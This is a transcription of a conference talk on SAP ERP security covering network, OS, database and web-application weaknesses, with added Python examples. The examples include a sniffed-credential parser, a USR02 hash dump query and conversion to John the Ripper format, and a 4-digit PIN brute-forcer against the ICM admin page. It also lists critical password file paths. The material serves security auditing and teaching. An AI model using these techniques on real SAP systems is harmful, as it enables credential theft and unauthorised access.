Some Notes On SAP Security - TROOPERS

Transcription

Some notes on SAP Security
Alexander Polyakov, PCI QSA, PA-QSA
Director of Security Audit Department, Digital Security
Head of Digital Security Research Group [DSecRG]
a.polyakov@dsec.ru

Who is that guy?
1. 5 yrs - work in the Digital Security company, now as Director of Security Audit Department
2. 3 yrs - Head of Digital Security Research Group
3. 1 yr - Expert council member of PCIDSS.RU
4. Found a lot of vulnerabilities in SAP, Oracle, IBM solutions
5. Wrote the first Russian book about Oracle Database security - "Oracle Security from the Eye of the Auditor. Attack and Defense" (in Russian)
6. One of the contributors to the Oracle with Metasploit project
7. Speaker at T2.fi, Troopers10, InfosecurityRussia, PCIDSSRUSSIA2010, Ruscrypto, Chaos Constructions (CC)
The main interests and activities:
- ERP security assessment / research
- Web application and database security assessment / research
- Penetration testing / security assessment
- Managing / teaching the research group
- PCI DSS / PA-DSS assessment
2002—2010, Digital Security

Digital Security
Digital Security is the leading Russian consulting company in the field of information security management, security audit and security standards, such as ISO 27001, PCI DSS and PA-DSS compliance.
The main activities:
- Information security consulting
- Business application security assessment
- Penetration testing
- Research center
- Security software development
- Information security awareness center
Research Center
The main mission of DSecRG is to research vulnerabilities in different applications and systems. The results of this work are then used by the experts of the Digital Security audit department when assessing the security level of information systems with active audit methods and when carrying out penetration tests.

Intro: main problems in ERP security
ERP (Enterprise resource planning) is an integrated computer-based system used to manage internal and external resources including tangible assets, financial resources, materials, and human resources. (from Wikipedia)
- ERP systems have a complex structure
- Mostly available only inside a company, so far fewer people can test them than, for example, Windows
- Contain many different vulnerabilities at all levels, from network to application
- Rarely updated, because administrators are afraid the system may break during an update

Intro: ERP security problems
(diagram: Development / Implementation)

SAP

Intro
- SAP (Systems, Applications and Products in Data Processing) is a German company devoted to the development of business solutions
- Biggest ERP software vendor
- Provides different solutions: ERP, CRM, PLM, SCM, SRM, GRC, Business One
- SAP runs on multiple hardware platforms, operating systems and databases

Intro
Business applications like ERP, CRM, SRM and others are one of the major topics within the field of computer security, as these applications store business data and any vulnerability in them can cause a significant monetary loss or even a stoppage of business.
Nonetheless, people still do not pay much attention to the technical side of SAP security.

SAP Security

SAP Security from a vendor's eye
Slide from one of the SAP presentations: "SAP Security - Secure Business in Open Environments" (…/schumacher.pdf)

SAP Security from the eye of a vendor
Solution:
- Security guides
- Security notes
- Security courses
- Administration courses
- Books

It is EASY!

Questions? Thanks

Wait

Key security features
So you must read and understand all those things, as a minimum, to make our SAP secure! Read about it from:
- Security guides
- Security notes
- Security courses
- Administration courses
- Books
- SDN, help.sap
- Additional resources

Just do it!
So you JUST must read and understand, as a minimum, all those things to make our SAP secure:
- Security guides - more than 200 documents, 50 pages each
- Security notes - more than 330 documents
- Security courses - just 3 courses, 500 pages each
- Administration courses - from 10 to 50 or more documents, 300 pages each
- Books - more than 30 about administration and security
- SDN, help.sap - many, many pages
- Additional resources - unlimited

After all...
But the picture is a little wrong. This is not money: this is your documentation.

Real SAP Security

(diagram: Platforms / Products / Applications / Your SAP implementation / Abstraction levels)

SAP Security overview
Platforms:
- ABAP
- JAVA
- ABAP + JAVA
Products (only ERP):
- SAP R/3 4.6
- SAP ERP Enterprise
- SAP ERP 2004 (ECC5) with NW 2004
- SAP ERP 2005 (ECC6) with NW 2004s
Abstraction levels:
- Network
- OS
- Database security
- Application / web application
- ERP
- Client-side
Applications:
- Different OS
- Different databases
- Different additional components
You must know the security aspects of all possible intersections!

SAP Security overview (diagram)

SAP Security: pentester's view
Abstraction levels:
- Network
- OS
- Database
- Additional applications
- Internal SAP (BASIS)
- Client-side

Network Security

Network security
Encryption:
- Password sniffing (in RFC the password is only XORed with a known value)
- No traffic encryption by default (DIAG, NetWeaver, Visual Admin, J2EE telnet, etc.)
Protocol vulnerabilities:
- RFC protocol vulnerabilities
- Getting information (RFC Ping)
- Executing remote commands (RFCEXEC, SAPXPG, RFC_START_PROGRAM)
- Registering an external server
Improper component implementation:
- Improper SAP firewall rules (allow all)
- No network segmentation between users, administrators, servers and the DMZ

Network security, example 1: RFC connections
Capture SAP traffic (32NN is the DIAG dispatcher port, 36NN the message server; the gateway used by RFC listens on 33NN):
    tcpdump -n -s 0 -i eth0 -w sap.pcap '(tcp[2:2] >= 3200 and tcp[2:2] <= 3300) or (tcp[2:2] >= 3600 and tcp[2:2] <= 3700)'
- Find a user and decode the password. This user has access to the XI system, which holds no business data
- Transaction SM59 shows all RFC connections; there one connection to the HR system with hardcoded credentials was found
- The credentials were those of the remote RFC user created for data exchange
- This user, called ALEREMOTE, had SAP_ALL privileges
As a result the auditor got access to all data in the HR system.

Network security, example 2: MMC password sniffing
- SAP MMC talks to the sapstartsrv web service, which is installed by default and listens on port 50013 (5NN13 for instance number NN)
- Used for remote management of SAP servers
- By default SSL is not configured
- The administration password is transmitted using HTTP Basic auth (base64)
- By sniffing this password we can get full control over the server
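As an added example (not part of the deck), this is what recovering the sniffed sapstartsrv password looks like once the packets are in hand: find the HTTP Basic header in the traffic to a 5NN13 port and base64-decode it. The two sample payloads, the host name sapsrv01 and the credentials inside them are constructed for the example.

```python
import base64
import binascii
import re

# Constructed sample of two TCP payloads as a sniffer would hand them over
# (made up for this example, not real captured traffic). The first is an
# HTTP request to sapstartsrv on port 50013 carrying HTTP Basic credentials;
# the second is a TLS ClientHello on 50014, from which nothing can be read.
SAMPLE_FLOWS = [
    {
        "dst_port": 50013,
        "payload": (
            b"POST /SAPControl HTTP/1.1\r\n"
            b"Host: sapsrv01:50013\r\n"
            b"Authorization: Basic ZG0wYWRtOkluaXRpYWwxMjM=\r\n"
            b"Content-Type: text/xml\r\n"
            b"\r\n"
            b"<SOAP-ENV:Envelope>...</SOAP-ENV:Envelope>"
        ),
    },
    {"dst_port": 50014, "payload": b"\x16\x03\x01\x00\x8d\x01\x00\x00\x89\x03\x03"},
]

# HTTP header lines end in CRLF; ^ and $ work per line because of re.M.
BASIC_RE = re.compile(rb"^Authorization:\s*Basic\s+([A-Za-z0-9+/=]+)\s*$", re.I | re.M)


def sapstartsrv_http_port(port):
    """True for 5NN13, the plaintext HTTP port of sapstartsrv for instance NN
    (the TLS port is 5NN14)."""
    return 50013 <= port <= 59913 and (port - 50013) % 100 == 0


def extract_basic_auth(payload):
    """Return (user, password) from an HTTP Basic Authorization header, or None.

    Base64 is an encoding, not encryption: anyone on the path decodes it.
    """
    match = BASIC_RE.search(payload)
    if not match:
        return None
    try:
        decoded = base64.b64decode(match.group(1), validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None
    user, sep, password = decoded.partition(":")
    return (user, password) if sep else None


def find_plaintext_admin_logins(flows):
    """Scan captured flows and list every sapstartsrv login sent in the clear."""
    hits = []
    for flow in flows:
        if not sapstartsrv_http_port(flow["dst_port"]):
            continue
        creds = extract_basic_auth(flow["payload"])
        if creds:
            hits.append((flow["dst_port"],) + creds)
    return hits


if __name__ == "__main__":
    for port, user, password in find_plaintext_admin_logins(SAMPLE_FLOWS):
        print(f"sapstartsrv login in the clear on port {port}: {user} / {password}")
```

The same scan run over a real capture is a quick way to prove to an administrator that the management password crosses the network readable; the fix is to move the clients to the HTTPS port 5NN14 and stop exposing 5NN13 beyond the administration network.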

Network security, example 3: pass-the-hash through RFC
- RFC functions can be called remotely
- You need a user and a password
- ALMOST ALL SAP administrators don't change the password of the user SAPCPIC
- Using its credentials we can call a function that tries to read a file on our SMB share
- Gotcha! Hashes are stolen


OS Security

OS security
OS and application vulnerabilities:
Any critical vulnerability in the OS or in applications installed on the SAP server can be used to get access to the OS and to business DATA. Examples of OS vulnerabilities are everywhere (securityfocus, milw0rm, exploit-db).
OS-specific security options:
- NFS access. SAP data and binaries can be accessed by an anonymous user via NFS
- OS access rights. Critical SAP files and Oracle data files may have insecure rights such as 755 or even 777
- Insecure rhosts. Remote access may be managed by rlogin from trusted servers, so once an attacker gets access to one SAP server he can access the others
- Physical access
- Etc.

OS vulnerabilities example (from OS to SAP)
- In one of the companies there was a Unix user for backup access, called backup
- This user had a simple password (guess what? :)
- After examining the access rights it was found that any OS user had read access to the system data files where the Oracle password hashes are stored:
    -rw-r--r--  1 orats2  dba  1768014992 May 20 20:03 /oracle/TS2/sapdata1/system_1/system.data1
An attacker can:
- access other data files
- crack the hashes (using rainbow tables) or rewrite the file with his own hash

OS vulnerabilities: sample critical files
There are many critical files on an SAP server that an unprivileged user can use to gain access to the SAP application:
- Database files (encrypted Oracle and SAP passwords): /oracle/<DBSID>/sapdata1/system_1/system.data1
- SAP config files (encrypted passwords): /usr/sap/<SAPSID>/<InstanceID>/sec/*, /usr/sap/<SAPSID>/<InstanceID>/sec/sapsys.pse
- Configtool config files (encrypted database password): \usr\sap\DM0\SYS\global\security\data\SecStore.properties, \usr\sap\DM0\SYS\global\security\data\SecStore.key
- J2EE trace files (plaintext passwords): /usr/sap/<SAPSID>/<InstanceID>/j2ee/cluster/dispatcher/log/defaultTrace.0.trc
- ICM config files (encrypted password): \usr\sap\DM0\SYS\exe\uc\NTI386\icmauth.txt
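An added example, not from the deck: a small permission audit that walks the critical-file list above and reports anything readable by group or others, which is the condition behind the backup-user story. The SID TS2 and instance DVEBMGS00 in the paths are constructed placeholders, and the sample tree is built in a temporary directory with two deliberately loose modes so the script runs anywhere; on a real host point audit_file_modes() at "/" with the paths filled in for your SID.

```python
import os
import stat
import tempfile

# Critical files from the list above, relative to the filesystem root.
# SID TS2 and instance DVEBMGS00 are constructed placeholders for this example.
CRITICAL_FILES = [
    "oracle/TS2/sapdata1/system_1/system.data1",                 # Oracle datafile with password hashes
    "usr/sap/TS2/DVEBMGS00/sec/sapsys.pse",                      # SAP PSE (encrypted credentials)
    "usr/sap/TS2/SYS/global/security/data/SecStore.properties",  # secure store with the DB password
    "usr/sap/TS2/SYS/global/security/data/SecStore.key",         # key for the secure store
    "usr/sap/TS2/DVEBMGS00/j2ee/cluster/dispatcher/log/defaultTrace.0.trc",  # J2EE trace, plaintext passwords
]

# Either of these bits means a non-owner can read the file.
GROUP_OR_OTHER_READ = stat.S_IRGRP | stat.S_IROTH


def audit_file_modes(root, relpaths):
    """Return [(relpath, '-rw-r--r--')] for every listed file that group or others can read.

    Missing files are skipped: a J2EE trace does not exist on an ABAP-only host.
    """
    findings = []
    for rel in relpaths:
        try:
            st = os.stat(os.path.join(root, rel))
        except FileNotFoundError:
            continue
        if st.st_mode & GROUP_OR_OTHER_READ:
            findings.append((rel, stat.filemode(st.st_mode)))
    return findings


def build_sample_tree(modes):
    """Create a throwaway tree with the listed files at the given modes (constructed sample)."""
    root = tempfile.mkdtemp(prefix="sapaudit_")
    for rel, mode in modes.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(b"sample content\n")
        os.chmod(path, mode)
    return root


def demo():
    """Build the sample tree with two misconfigured files and audit it."""
    modes = {rel: 0o600 for rel in CRITICAL_FILES}
    modes[CRITICAL_FILES[0]] = 0o644   # world-readable datafile, as in the backup-user story
    modes[CRITICAL_FILES[4]] = 0o666   # trace file readable and writable by everyone
    return audit_file_modes(build_sample_tree(modes), CRITICAL_FILES)


if __name__ == "__main__":
    for rel, mode in demo():
        print(f"{mode}  /{rel}")
```

The check is deliberately about the read bit only: the slide's 755 and 777 examples are both caught, and so is the quieter 644 from the ls output, which is the one administrators tend to overlook because it "looks normal".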

Database Security

Database security
Many SAP instances are installed with an Oracle database. As is well known, a default Oracle installation has many security problems in all areas. Briefly:
- Database vulnerabilities
- Many default passwords
- Default SAP passwords (SAPR3/SAP)
- Password policies such as password length and account locking are not enabled by default
- Security properties such as REMOTE_OS_AUTHENT
- Listener security (for example the latest buffer overflows that give remote access to the OS)
- Many, many others
Direct access to the database means full SAP compromise!

Database security example 1
- In an SAP R/3 4.71 installation with Oracle 9i the user DBSNMP was found with the password DBSNMP
- It has the "SELECT ANY DICTIONARY" privilege and therefore access to DBA_USERS, where the Oracle password hashes are stored
- An attacker can try to crack them and get access to the database with SYS or SYSTEM rights

Database security example 2
- In another SAP installation the user SAPR3 was found with the default password SAP
- With these credentials we got access to the table with the password hashes of all SAP users:
    select bname, bcode, uflag from sapr3.usr02 where mandt <> '000';
- Using these hashes and the latest version of John the Ripper
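An added example (not from the deck) of what to do with the rows that query returns: convert them into input for john --format=sapb (the format for the old BCODE hash; PASSCODE hashes go to --format=sapg) and, before any cracking starts, list which standard SAP accounts are present and whether they are locked. The USR02 rows below are constructed and the BCODE values are made up; the user name padded to 40 characters before the "$" is the input form I know the sapb format accepts, so treat that layout as an assumption and check it against the john version you run.

```python
# Constructed USR02 rows (MANDT, BNAME, BCODE, UFLAG) standing in for the
# output of the query above. The BCODE values are made up, not real hashes.
SAMPLE_USR02 = [
    ("100", "SAP*",       "A1B2C3D4E5F60718", 0),
    ("100", "DDIC",       "0123456789ABCDEF", 0),
    ("100", "SAPCPIC",    "FEDCBA9876543210", 0),
    ("100", "JSMITH",     "00FF00FF00FF00FF", 128),
    ("100", "ALEREMOTE",  "1122334455667788", 0),
    ("000", "EARLYWATCH", "8877665544332211", 64),
]

# Standard accounts delivered with every SAP system; their well-known default
# passwords are the first thing a pentester tries.
DEFAULT_ACCOUNTS = {"SAP*", "DDIC", "SAPCPIC", "EARLYWATCH", "TMSADM"}

# USR02-UFLAG lock bits.
LOCK_BITS = {
    32: "locked globally by admin",
    64: "locked locally by admin",
    128: "locked after failed logons",
}


def to_john_sapb(rows, include_client_000=False):
    """Turn USR02 rows into john --format=sapb lines: user name padded to 40, '$', BCODE.

    BCODE is salted with the user name, so the name must travel with the hash.
    Client 000 (the reference client) is skipped unless asked for.
    """
    return [f"{bname:<40}${bcode.upper()}"
            for mandt, bname, bcode, _uflag in rows
            if include_client_000 or mandt != "000"]


def describe_uflag(uflag):
    """Human-readable lock status from the UFLAG bit mask."""
    parts = [text for bit, text in LOCK_BITS.items() if uflag & bit]
    return ", ".join(parts) if parts else "not locked"


def find_default_accounts(rows):
    """List the standard accounts present in the dump with their lock status."""
    return [(bname, mandt, describe_uflag(uflag))
            for mandt, bname, _bcode, uflag in rows
            if bname in DEFAULT_ACCOUNTS]


if __name__ == "__main__":
    print("\n".join(to_john_sapb(SAMPLE_USR02)))
    for bname, mandt, status in find_default_accounts(SAMPLE_USR02):
        print(f"default account {bname} in client {mandt}: {status}")
```

An unlocked SAPCPIC in the output is exactly the precondition for the pass-the-hash example on the network slides, so the account check is worth running even when there is no time to crack anything.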

Database security example 3: REMOTE_OS_AUTHENT
No comments

Applications Security

Applications and web applications security
- There are many different web servers installed in an SAP landscape, such as Web AS, ITS, IGS
- SAP usually ships with many different web applications that use different technologies: JSP servlets, web services, Web Dynpro, EJB, Portal iViews, BSP
- All SAP implementations contain internally developed code, so every company may have its own vulnerabilities

Application and web server vulnerabilities
- All possible web application vulnerabilities
- Buffer overflow and format string vulnerabilities in SAP IGS, SAP ITS, NetWeaver, etc.
- Other specific vulnerabilities
Examples can be found at dsecrg.com, ngssoftware.com, cybsec.com, onapsis.com

Web applications security example
- When an administrator sets up the ICM, the password for icmadm is generated automatically
- In NetWeaver 2004 (SAP ECC 5) it is a random 4-digit number
- To enter the ICM admin interface you connect to http://ip:port/sap/wdisp/admin/default.html, where you get a Basic auth prompt
- And there is no limit on password guessing :)
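An added example, not from the deck, that puts numbers on the last two bullets: a 4-digit password is a keyspace of 10,000, and without a lockout the whole of it can be walked with one Basic auth request per guess. guess_pin() takes the attempt as a callable so the walk can be exercised offline; http_attempt() is the real HTTP version for the URL from the slide. The base URL, the user name icmadm as the default, and the PIN used in the demo are assumptions for illustration.

```python
import base64
import functools
import sys
import urllib.error
import urllib.request

ICM_ADMIN_PATH = "/sap/wdisp/admin/default.html"   # path from the slide


def basic_header(user, password):
    """Build the Authorization header the browser would send for the Basic auth prompt."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return {"Authorization": f"Basic {token}"}


def http_attempt(base_url, user, password, timeout=5):
    """Try one Basic auth login against the ICM admin page.

    True when the page is served (HTTP 200), False on 401. Any other status
    (403, 503, ...) is raised: that usually means the server has started to
    throttle or lock, which is exactly the control whose absence the slide is about.
    """
    req = urllib.request.Request(base_url + ICM_ADMIN_PATH,
                                 headers=basic_header(user, password))
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status == 200
    except urllib.error.HTTPError as err:
        if err.code == 401:
            return False
        raise


def guess_pin(attempt, user="icmadm", digits=4):
    """Walk the whole 10**digits keyspace in order; attempt(user, pin) returns True on success.

    Returns (pin, number_of_requests) on success, (None, 10**digits) otherwise.
    With no lockout a 4-digit PIN costs at most 10,000 requests.
    """
    space = 10 ** digits
    for n in range(space):
        pin = f"{n:0{digits}d}"
        if attempt(user, pin):
            return pin, n + 1
    return None, space


if __name__ == "__main__":
    # Usage: python icm_pin.py http://ip:port   (assumed invocation for the example)
    base_url = sys.argv[1] if len(sys.argv) > 1 else "http://127.0.0.1:8000"
    pin, requests_made = guess_pin(functools.partial(http_attempt, base_url))
    print(f"pin={pin} after {requests_made} requests")
```

Run against your own ICM, the useful outcome is not the PIN but the exception: if the loop finishes all 10,000 requests without the server ever answering anything but 401, there is no lockout and the random 4-digit password is not a control.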


Latest web application vulnerabilities
- In total, nearly 40 vulnerabilities in various SAP applications have been published so far by various researchers
- There are also about 50 vulnerabilities in different SAP web applications found by DSecRG and sent to the vendor; several of them are not yet patched
http://www.dsecrg.com/pages/vul/

SAP ERP Internal Security

